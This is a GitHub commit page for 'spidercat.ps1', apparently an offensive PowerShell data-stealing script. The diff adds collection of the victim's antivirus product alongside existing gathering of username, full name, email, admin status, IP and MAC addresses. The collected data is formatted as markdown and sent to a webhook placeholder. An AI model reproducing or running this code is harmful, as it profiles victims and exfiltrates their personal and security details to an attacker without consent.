Skip to content

Commit

Permalink
Sends Antivirus Info to markdown
Browse files Browse the repository at this point in the history
  • Loading branch information
atomiczsec authored Apr 21, 2023
1 parent 0b55402 commit 4586ebe
Showing 1 changed file with 5 additions and 1 deletion.
6 changes: 5 additions & 1 deletion spidercat.ps1
Original file line number Diff line number Diff line change
Expand Up @@ -2,7 +2,7 @@
# created by : C0SM0

# change me
$webhook = "WEBHOOK"
$webhook = "WEBHOOK HERE"

# variables
$account = $env:userprofile.Split('\')[2]
Expand Down Expand Up @@ -124,6 +124,7 @@ function user_markdown {
$full_name = Get-fullName
$email = Get-email
$is_admin = (Get-LocalGroupMember 'Administrators').Name -contains "$env:COMPUTERNAME\$env:USERNAME"
$antivirus = Get-AntivirusSolution

# create markdown content
$content = @"
Expand All @@ -143,6 +144,9 @@ function user_markdown {
- Private : $private
- MAC : $MAC
## PC Information
- Antivirus : $antivirus
## Connected Networks
"@
# send data set one
Expand Down

0 comments on commit 4586ebe

Please sign in to comment.